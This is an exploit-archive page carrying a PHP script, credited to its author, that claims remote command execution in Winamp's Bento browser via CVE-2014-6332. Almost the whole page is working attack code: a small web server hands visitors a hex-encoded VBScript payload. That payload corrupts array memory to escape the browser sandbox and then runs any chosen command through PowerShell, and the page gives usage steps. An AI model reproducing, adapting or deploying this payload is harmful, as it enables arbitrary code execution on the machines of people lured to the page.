Home / os / winmobile

Winamp Bento Browser Remote Code Execution

Posted on 27 October 2015

#!/usr/bin/php
<?php
/* ##########################################################
 # Author : Ehsan Noreddini
 # E-Mail : me@ehsann.info
 # Social : @prot3ct0r
 # Title : Winamp Bento Browser - Remote Command Execution
 # Version : Winamp 5.666
 # CVE : CVE2014-6332
 # Tested on : Windows7
 # Date : 24 October 2015
 # Download : http://www.filehorse.com/download-winamp/
 # Website : http://winamp.com
 ##########################################################
 # 1. run php code : php exploit.php
 # 2. get the output address and open it in browser !
 ##########################################################
 # Original Code : http://ehsann.info/exploit/6.txt
 # POC : http://ehsann.info/video/winamp_r_c_e.mp4
 ##########################################################
*/

 if(!$argv[1] || $argv[1] == "-h" || $argv[1] == "help" || $argv[1] == "--help" || $arv[1] == "-help"){
 print "
[+]Exploit Usage:

 php exploit.php [COMMAND] [PORT]

[+]Example:

 php exploit.php notepad.exe 80

 ";

 }
 else{
 print "
 / ___|___ _ __ ___ _ __ ___ __ _ _ __ __| | | ____|_ _____ ___ _ _| |_(_) ___ _ __ | ____|_ ___ __ | | ___ (_) |_
| | / _ | '_ ` _ | '_ ` _  / _` | '_  / _` | | _|  / / _ / __| | | | __| |/ _ | '_  | _|  / / '_ | |/ _ | | __|
| |__| (_) | | | | | | | | | | | (_| | | | | (_| | | |___ > < __/ (__| |_| | |_| | (_) | | | | | |___ > <| |_) | | (_) | | |_
 \____\___/|_| |_| |_|_| |_| |_|\__,_|_| |_|\__,_| |_____/_/\_\___|\___|\__,_|\__|_|\___/|_| |_| |_____/_/\_ .__/|_|\___/|_|\__|
 |_| 
";
 if(!$argv[2] || !is_integer($argv[2])){ #check args
 $port=80; # Port Address
 }
 else{
 $port=$argv[2];# Port Address
 }
 $command = $argv[1];
 print "Server is started on " . "localhost:" . "$port
"; # Start Exploit
 $socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
 socket_bind($socket, 0,$port);
 socket_listen($socket);
 # MS14-064
 $msgd = "x3Cx68x74x6Dx6Cx3Ex0Dx0Ax3Cx6Dx65x74x61x20x68x74x74x70x2Dx65x71x75x69x76x3Dx22x58x2Dx55x41x2Dx43x6Fx6Dx70x61x74x69x62x6Cx65x22x20x63x6Fx6Ex74x65x6Ex74x3Dx22x49x45x3Dx45x6Dx75x6Cx61x74x65x49x45x38x22x20x3Ex0Dx0Ax3Cx68x65x61x64x3Ex0Dx0Ax3Cx2Fx68x65x61x64x3Ex0Dx0Ax3Cx62x6Fx64x79x3Ex0Dx0Ax20x0Dx0Ax3Cx53x43x52x49x50x54x20x4Cx41x4Ex47x55x41x47x45x3Dx22x56x42x53x63x72x69x70x74x22x3Ex0Dx0Ax66x75x6Ex63x74x69x6Fx6Ex20x72x75x6Ex6Dx75x6Dx61x61x28x29x20x0Dx0Ax4Fx6Ex20x45x72x72x6Fx72x20x52x65x73x75x6Dx65x20x4Ex65x78x74x0Dx0Ax73x65x74x20x73x68x65x6Cx6Cx3Dx63x72x65x61x74x65x6Fx62x6Ax65x63x74x28x22x53x68x65x6Cx6Cx2Ex41x70x70x6Cx69x63x61x74x69x6Fx6Ex22x29x0Dx0Ax63x6Fx6Dx6Dx61x6Ex64x3Dx22x49x6Ex76x6Fx6Bx65x2Dx45x78x70x72x65x73x73x69x6Fx6Ex20x24x28x4Ex65x77x2Dx4Fx62x6Ax65x63x74x20x2Dx63x6Fx6Dx20x53x68x65x6Cx6Cx2Ex41x70x70x6Cx69x63x61x74x69x6Fx6Ex29x2Ex53x68x65x6Cx6Cx45x78x65x63x75x74x65x28x27x43x4Fx4Dx4Dx41x4Ex44x27x29x3Bx22x0Dx0Ax73x68x65x6Cx6Cx2Ex53x68x65x6Cx6Cx45x78x65x63x75x74x65x20x22x70x6Fx77x65x72x73x68x65x6Cx6Cx2Ex65x78x65x22x2Cx20x22x2Dx43x6Fx6Dx6Dx61x6Ex64x20x22x20x26x20x63x6Fx6Dx6Dx61x6Ex64x2Cx20x22x22x2Cx20x22x72x75x6Ex61x73x22x2Cx20x30x0Dx0Ax65x6Ex64x20x66x75x6Ex63x74x69x6Fx6Ex0Dx0Ax3Cx2Fx73x63x72x69x70x74x3Ex0Dx0Ax20x0Dx0Ax3Cx53x43x52x49x50x54x20x4Cx41x4Ex47x55x41x47x45x3Dx22x56x42x53x63x72x69x70x74x22x3Ex0Dx0Ax20x20x0Dx0Ax64x69x6Dx20x20x20x61x61x28x29x0Dx0Ax64x69x6Dx20x20x20x61x62x28x29x0Dx0Ax64x69x6Dx20x20x20x61x30x0Dx0Ax64x69x6Dx20x20x20x61x31x0Dx0Ax64x69x6Dx20x20x20x61x32x0Dx0Ax64x69x6Dx20x20x20x61x33x0Dx0Ax64x69x6Dx20x20x20x77x69x6Ex39x78x0Dx0Ax64x69x6Dx20x20x20x69x6Ex74x56x65x72x73x69x6Fx6Ex0Dx0Ax64x69x6Dx20x20x20x72x6Ex64x61x0Dx0Ax64x69x6Dx20x20x20x66x75x6Ex63x6Cx61x73x73x0Dx0Ax64x69x6Dx20x20x20x6Dx79x61x72x72x61x79x0Dx0Ax20x0Dx0Ax42x65x67x69x6Ex28x29x0Dx0Ax20x0Dx0Ax66x75x6Ex63x74x69x6Fx6Ex20x42x65x67x69x6Ex28x29x0Dx0Ax20x20x4Fx6Ex20x45x72x72x6Fx72x20x52x65x73x75x6Dx65x20x4Ex65x78x74x0Dx0Ax20x20x69x6Ex66x6Fx3Dx4Ex61x76x69x67x61x74x6Fx72x2Ex55x73x65x72x41x67x65x6Ex74x0Dx0Ax20x0Dx0Ax20x20x69x66x28x69x6Ex73x74x72x28x69x6Ex66x6Fx2Cx22x57x69x6Ex36x34x22x29x3Ex30x29x20x20x20x74x68x65x6Ex0Dx0Ax20x20x20x20x20x65x78x69x74x20x20x20x66x75x6Ex63x74x69x6Fx6Ex0Dx0Ax20x20x65x6Ex64x20x69x66x0Dx0Ax20x0Dx0Ax20x20x69x66x20x28x69x6Ex73x74x72x28x69x6Ex66x6Fx2Cx22x4Dx53x49x45x22x29x3Ex30x29x20x20x20x74x68x65x6Ex20x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x69x6Ex74x56x65x72x73x69x6Fx6Ex20x3Dx20x43x49x6Ex74x28x4Dx69x64x28x69x6Ex66x6Fx2Cx20x49x6Ex53x74x72x28x69x6Ex66x6Fx2Cx20x22x4Dx53x49x45x22x29x20x2Bx20x35x2Cx20x32x29x29x20x20x20x0Dx0Ax20x20x65x6Cx73x65x0Dx0Ax20x20x20x20x20x65x78x69x74x20x20x20x66x75x6Ex63x74x69x6Fx6Ex20x20x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x0Dx0Ax20x20x65x6Ex64x20x69x66x0Dx0Ax20x0Dx0Ax20x20x77x69x6Ex39x78x3Dx30x0Dx0Ax20x0Dx0Ax20x20x42x65x67x69x6Ex49x6Ex69x74x28x29x0Dx0Ax20x20x49x66x20x43x72x65x61x74x65x28x29x3Dx54x72x75x65x20x54x68x65x6Ex0Dx0Ax20x20x20x20x20x6Dx79x61x72x72x61x79x3Dx20x20x20x20x20x20x20x20x63x68x72x77x28x30x31x29x26x63x68x72x77x28x32x31x37x36x29x26x63x68x72x77x28x30x31x29x26x63x68x72x77x28x30x30x29x26x63x68x72x77x28x30x30x29x26x63x68x72x77x28x30x30x29x26x63x68x72x77x28x30x30x29x26x63x68x72x77x28x30x30x29x0Dx0Ax20x20x20x20x20x6Dx79x61x72x72x61x79x3Dx6Dx79x61x72x72x61x79x26x63x68x72x77x28x30x30x29x26x63x68x72x77x28x33x32x37x36x37x29x26x63x68x72x77x28x30x30x29x26x63x68x72x77x28x30x29x0Dx0Ax20x0Dx0Ax20x20x20x20x20x69x66x28x69x6Ex74x56x65x72x73x69x6Fx6Ex3Cx34x29x20x74x68x65x6Ex0Dx0Ax20x20x20x20x20x20x20x20x20x64x6Fx63x75x6Dx65x6Ex74x2Ex77x72x69x74x65x28x22x3Cx62x72x3Ex20x49x45x22x29x0Dx0Ax20x20x20x20x20x20x20x20x20x64x6Fx63x75x6Dx65x6Ex74x2Ex77x72x69x74x65x28x69x6Ex74x56x65x72x73x69x6Fx6Ex29x0Dx0Ax20x20x20x20x20x20x20x20x20x72x75x6Ex73x68x65x6Cx6Cx63x6Fx64x65x28x29x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x0Dx0Ax20x20x20x20x20x65x6Cx73x65x20x20x0Dx0Ax20x20x20x20x20x20x20x20x20x20x73x65x74x6Ex6Fx74x73x61x66x65x6Dx6Fx64x65x28x29x0Dx0Ax20x20x20x20x20x65x6Ex64x20x69x66x0Dx0Ax20x20x65x6Ex64x20x69x66x0Dx0Ax65x6Ex64x20x66x75x6Ex63x74x69x6Fx6Ex0Dx0Ax20x0Dx0Ax66x75x6Ex63x74x69x6Fx6Ex20x42x65x67x69x6Ex49x6Ex69x74x28x29x0Dx0Ax20x20x20x52x61x6Ex64x6Fx6Dx69x7Ax65x28x29x0Dx0Ax20x20x20x72x65x64x69x6Dx20x61x61x28x35x29x0Dx0Ax20x20x20x72x65x64x69x6Dx20x61x62x28x35x29x0Dx0Ax20x20x20x61x30x3Dx31x33x2Bx31x37x2Ax72x6Ex64x28x36x29x0Dx0Ax20x20x20x61x33x3Dx37x2Bx33x2Ax72x6Ex64x28x35x29x0Dx0Ax65x6Ex64x20x66x75x6Ex63x74x69x6Fx6Ex0Dx0Ax20x0Dx0Ax66x75x6Ex63x74x69x6Fx6Ex20x43x72x65x61x74x65x28x29x0Dx0Ax20x20x4Fx6Ex20x45x72x72x6Fx72x20x52x65x73x75x6Dx65x20x4Ex65x78x74x0Dx0Ax20x20x64x69x6Dx20x69x0Dx0Ax20x20x43x72x65x61x74x65x3Dx46x61x6Cx73x65x0Dx0Ax20x20x46x6Fx72x20x69x20x3Dx20x30x20x54x6Fx20x34x30x30x0Dx0Ax20x20x20x20x49x66x20x4Fx76x65x72x28x29x3Dx54x72x75x65x20x54x68x65x6Ex0Dx0Ax20x20x20x20x20x20x20x43x72x65x61x74x65x3Dx54x72x75x65x0Dx0Ax20x20x20x20x20x20x20x45x78x69x74x20x46x6Fx72x0Dx0Ax20x20x20x20x45x6Ex64x20x49x66x20x0Dx0Ax20x20x4Ex65x78x74x0Dx0Ax65x6Ex64x20x66x75x6Ex63x74x69x6Fx6Ex0Dx0Ax20x0Dx0Ax73x75x62x20x74x65x73x74x61x61x28x29x0Dx0Ax65x6Ex64x20x73x75x62x0Dx0Ax20x0Dx0Ax66x75x6Ex63x74x69x6Fx6Ex20x6Dx79x64x61x74x61x28x29x0Dx0Ax20x20x20x20x4Fx6Ex20x45x72x72x6Fx72x20x52x65x73x75x6Dx65x20x4Ex65x78x74x0Dx0Ax20x20x20x20x20x69x3Dx74x65x73x74x61x61x0Dx0Ax20x20x20x20x20x69x3Dx6Ex75x6Cx6Cx0Dx0Ax20x20x20x20x20x72x65x64x69x6Dx20x20x50x72x65x73x65x72x76x65x20x61x61x28x61x32x29x20x20x0Dx0Ax20x20x20x0Dx0Ax20x20x20x20x20x61x62x28x30x29x3Dx30x0Dx0Ax20x20x20x20x20x61x61x28x61x31x29x3Dx69x0Dx0Ax20x20x20x20x20x61x62x28x30x29x3Dx36x2Ex33x36x35x39x38x37x33x37x34x33x37x38x30x31x45x2Dx33x31x34x0Dx0Ax20x0Dx0Ax20x20x20x20x20x61x61x28x61x31x2Bx32x29x3Dx6Dx79x61x72x72x61x79x0Dx0Ax20x20x20x20x20x61x62x28x32x29x3Dx31x2Ex37x34x30x38x38x35x33x34x37x33x31x33x32x34x45x2Dx33x31x30x20x20x0Dx0Ax20x20x20x20x20x6Dx79x64x61x74x61x3Dx61x61x28x61x31x29x0Dx0Ax20x20x20x20x20x72x65x64x69x6Dx20x20x50x72x65x73x65x72x76x65x20x61x61x28x61x30x29x20x20x0Dx0Ax65x6Ex64x20x66x75x6Ex63x74x69x6Fx6Ex20x0Dx0Ax20x0Dx0Ax20x0Dx0Ax66x75x6Ex63x74x69x6Fx6Ex20x73x65x74x6Ex6Fx74x73x61x66x65x6Dx6Fx64x65x28x29x0Dx0Ax20x20x20x20x4Fx6Ex20x45x72x72x6Fx72x20x52x65x73x75x6Dx65x20x4Ex65x78x74x0Dx0Ax20x20x20x20x69x3Dx6Dx79x64x61x74x61x28x29x20x20x0Dx0Ax20x20x20x20x69x3Dx72x75x6Dx28x69x2Bx38x29x0Dx0Ax20x20x20x20x69x3Dx72x75x6Dx28x69x2Bx31x36x29x0Dx0Ax20x20x20x20x6Ax3Dx72x75x6Dx28x69x2Bx26x68x31x33x34x29x20x20x0Dx0Ax20x20x20x20x66x6Fx72x20x6Bx3Dx30x20x74x6Fx20x26x68x36x30x20x73x74x65x70x20x34x0Dx0Ax20x20x20x20x20x20x20x20x6Ax3Dx72x75x6Dx28x69x2Bx26x68x31x32x30x2Bx6Bx29x0Dx0Ax20x20x20x20x20x20x20x20x69x66x28x6Ax3Dx31x34x29x20x74x68x65x6Ex0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x6Ax3Dx30x20x20x20x20x20x20x20x20x20x20x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x72x65x64x69x6Dx20x20x50x72x65x73x65x72x76x65x20x61x61x28x61x32x29x20x20x20x20x20x20x20x20x20x20x20x20x20x0Dx0Ax20x20x20x20x20x61x61x28x61x31x2Bx32x29x28x69x2Bx26x68x31x31x63x2Bx6Bx29x3Dx61x62x28x34x29x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x72x65x64x69x6Dx20x20x50x72x65x73x65x72x76x65x20x61x61x28x61x30x29x20x20x0Dx0Ax20x0Dx0Ax20x20x20x20x20x6Ax3Dx30x20x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x6Ax3Dx72x75x6Dx28x69x2Bx26x68x31x32x30x2Bx6Bx29x20x20x20x0Dx0Ax20x20x20x20x20x20x20x20x20x20x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x45x78x69x74x20x66x6Fx72x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x65x6Ex64x20x69x66x0Dx0Ax20x0Dx0Ax20x20x20x20x6Ex65x78x74x20x0Dx0Ax20x20x20x20x61x62x28x32x29x3Dx31x2Ex36x39x37x35x39x36x36x33x33x31x36x37x34x37x45x2Dx33x31x33x0Dx0Ax20x20x20x20x72x75x6Ex6Dx75x6Dx61x61x28x29x20x0Dx0Ax65x6Ex64x20x66x75x6Ex63x74x69x6Fx6Ex0Dx0Ax20x0Dx0Ax66x75x6Ex63x74x69x6Fx6Ex20x4Fx76x65x72x28x29x0Dx0Ax20x20x20x20x4Fx6Ex20x45x72x72x6Fx72x20x52x65x73x75x6Dx65x20x4Ex65x78x74x0Dx0Ax20x20x20x20x64x69x6Dx20x74x79x70x65x31x2Cx74x79x70x65x32x2Cx74x79x70x65x33x0Dx0Ax20x20x20x20x4Fx76x65x72x3Dx46x61x6Cx73x65x0Dx0Ax20x20x20x20x61x30x3Dx61x30x2Bx61x33x0Dx0Ax20x20x20x20x61x31x3Dx61x30x2Bx32x0Dx0Ax20x20x20x20x61x32x3Dx61x30x2Bx26x68x38x30x30x30x30x30x30x0Dx0Ax20x20x20x0Dx0Ax20x20x20x20x72x65x64x69x6Dx20x20x50x72x65x73x65x72x76x65x20x61x61x28x61x30x29x20x0Dx0Ax20x20x20x20x72x65x64x69x6Dx20x20x20x61x62x28x61x30x29x20x20x20x20x20x0Dx0Ax20x20x20x0Dx0Ax20x20x20x20x72x65x64x69x6Dx20x20x50x72x65x73x65x72x76x65x20x61x61x28x61x32x29x0Dx0Ax20x20x20x0Dx0Ax20x20x20x20x74x79x70x65x31x3Dx31x0Dx0Ax20x20x20x20x61x62x28x30x29x3Dx31x2Ex31x32x33x34x35x36x37x38x39x30x31x32x33x34x35x36x37x38x39x30x31x32x33x34x35x36x37x38x39x30x0Dx0Ax20x20x20x20x61x61x28x61x30x29x3Dx31x30x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x0Dx0Ax20x20x20x20x49x66x28x49x73x4Fx62x6Ax65x63x74x28x61x61x28x61x31x2Dx31x29x29x20x3Dx20x46x61x6Cx73x65x29x20x54x68x65x6Ex0Dx0Ax20x20x20x20x20x20x20x69x66x28x69x6Ex74x56x65x72x73x69x6Fx6Ex3Cx34x29x20x74x68x65x6Ex0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x6Dx65x6Dx3Dx63x69x6Ex74x28x61x30x2Bx31x29x2Ax31x36x20x20x20x20x20x20x20x20x20x20x20x20x20x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x6Ax3Dx76x61x72x74x79x70x65x28x61x61x28x61x31x2Dx31x29x29x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x69x66x28x28x6Ax3Dx6Dx65x6Dx2Bx34x29x20x6Fx72x20x28x6Ax2Ax38x3Dx6Dx65x6Dx2Bx38x29x29x20x74x68x65x6Ex0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x69x66x28x76x61x72x74x79x70x65x28x61x61x28x61x31x2Dx31x29x29x3Cx3Ex30x29x20x20x54x68x65x6Ex20x20x20x20x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x49x66x28x49x73x4Fx62x6Ax65x63x74x28x61x61x28x61x31x29x29x20x3Dx20x46x61x6Cx73x65x20x29x20x54x68x65x6Ex20x20x20x20x20x20x20x20x20x20x20x20x20x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x74x79x70x65x31x3Dx56x61x72x54x79x70x65x28x61x61x28x61x31x29x29x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x65x6Ex64x20x69x66x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x65x6Ex64x20x69x66x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x65x6Cx73x65x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x72x65x64x69x6Dx20x20x50x72x65x73x65x72x76x65x20x61x61x28x61x30x29x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x65x78x69x74x20x20x66x75x6Ex63x74x69x6Fx6Ex0Dx0Ax20x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x65x6Ex64x20x69x66x20x0Dx0Ax20x20x20x20x20x20x20x20x65x6Cx73x65x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x69x66x28x76x61x72x74x79x70x65x28x61x61x28x61x31x2Dx31x29x29x3Cx3Ex30x29x20x20x54x68x65x6Ex20x20x20x20x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x49x66x28x49x73x4Fx62x6Ax65x63x74x28x61x61x28x61x31x29x29x20x3Dx20x46x61x6Cx73x65x20x29x20x54x68x65x6Ex0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x74x79x70x65x31x3Dx56x61x72x54x79x70x65x28x61x61x28x61x31x29x29x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x65x6Ex64x20x69x66x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x65x6Ex64x20x69x66x0Dx0Ax20x20x20x20x20x20x20x20x65x6Ex64x20x69x66x0Dx0Ax20x20x20x20x65x6Ex64x20x69x66x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x0Dx0Ax20x20x20x20x20x0Dx0Ax20x20x20x20x49x66x28x74x79x70x65x31x3Dx26x68x32x66x36x36x29x20x54x68x65x6Ex20x20x20x20x20x20x20x20x20x0Dx0Ax20x20x20x20x20x20x20x20x20x20x4Fx76x65x72x3Dx54x72x75x65x20x20x20x20x20x20x0Dx0Ax20x20x20x20x45x6Ex64x20x49x66x20x20x0Dx0Ax20x20x20x20x49x66x28x74x79x70x65x31x3Dx26x68x42x39x41x44x29x20x54x68x65x6Ex0Dx0Ax20x20x20x20x20x20x20x20x20x20x4Fx76x65x72x3Dx54x72x75x65x0Dx0Ax20x20x20x20x20x20x20x20x20x20x77x69x6Ex39x78x3Dx31x0Dx0Ax20x20x20x20x45x6Ex64x20x49x66x20x20x0Dx0Ax20x0Dx0Ax20x20x20x20x72x65x64x69x6Dx20x20x50x72x65x73x65x72x76x65x20x61x61x28x61x30x29x20x20x20x20x20x20x20x20x20x20x0Dx0Ax20x20x20x20x20x20x20x20x20x0Dx0Ax65x6Ex64x20x66x75x6Ex63x74x69x6Fx6Ex0Dx0Ax20x0Dx0Ax66x75x6Ex63x74x69x6Fx6Ex20x72x75x6Dx28x61x64x64x29x20x0Dx0Ax20x20x20x20x4Fx6Ex20x45x72x72x6Fx72x20x52x65x73x75x6Dx65x20x4Ex65x78x74x0Dx0Ax20x20x20x20x72x65x64x69x6Dx20x20x50x72x65x73x65x72x76x65x20x61x61x28x61x32x29x20x20x0Dx0Ax20x20x20x0Dx0Ax20x20x20x20x61x62x28x30x29x3Dx30x20x20x20x0Dx0Ax20x20x20x20x61x61x28x61x31x29x3Dx61x64x64x2Bx34x20x20x20x20x20x0Dx0Ax20x20x20x20x61x62x28x30x29x3Dx31x2Ex36x39x37x35x39x36x36x33x33x31x36x37x34x37x45x2Dx33x31x33x20x20x20x20x20x20x20x0Dx0Ax20x20x20x20x72x75x6Dx3Dx6Cx65x6Ex62x28x61x61x28x61x31x29x29x20x20x0Dx0Ax20x20x20x20x0Dx0Ax20x20x20x20x61x62x28x30x29x3Dx30x0Dx0Ax20x20x20x20x72x65x64x69x6Dx20x20x50x72x65x73x65x72x76x65x20x61x61x28x61x30x29x0Dx0Ax65x6Ex64x20x66x75x6Ex63x74x69x6Fx6Ex0Dx0Ax20x0Dx0Ax3Cx2Fx73x63x72x69x70x74x3Ex0Dx0Ax20x3Cx63x65x6Ex74x65x72x3Ex0Dx0Ax20x3Cx73x74x72x6Fx6Ex67x3Ex54x68x69x73x20x69x73x20x61x20x64x65x6Dx6Fx20x66x6Fx72x20x74x68x65x20x76x75x6Cx6Ex65x72x61x62x69x6Cx69x74x79x2Ex3Cx2Fx73x74x72x6Fx6Ex67x3Ex0Dx0Ax20x3Cx62x72x20x2Fx3Ex0Dx0Ax20x3Cx69x3Ex45x68x73x61x6Ex20x4Ex6Fx72x65x64x64x69x6Ex69x20x2Dx20x40x70x72x6Fx74x33x63x74x30x72x3Cx69x3Ex0Dx0Ax20x3Cx62x72x20x2Fx3Ex3Cx69x3Ex65x68x73x61x6Ex6Ex2Ex69x6Ex66x6Fx3Cx2Fx69x3Ex0Dx0Ax20x3Cx2Fx63x65x6Ex74x65x72x3Ex0Dx0Ax3Cx2Fx62x6Fx64x79x3Ex0Dx0Ax3Cx2Fx68x74x6Dx6Cx3E";
 $msgd=str_replace("COMMAND",$command,$msgd);
 for (;;) {
 if ($client = @socket_accept($socket)) {
 socket_write($client, "HTTP/1.1 200 OK
" .
 "Content-length: " . strlen($msgd) . "
" .
 "Content-Type: text/html; charset=UTF-8

" .
 $msgd);
 print "
 [+]Sending the exploit to target ... 
" ;
 }
 else usleep(100000);
 }

 }
 ?>

 

TOP

Malware :

Exploits :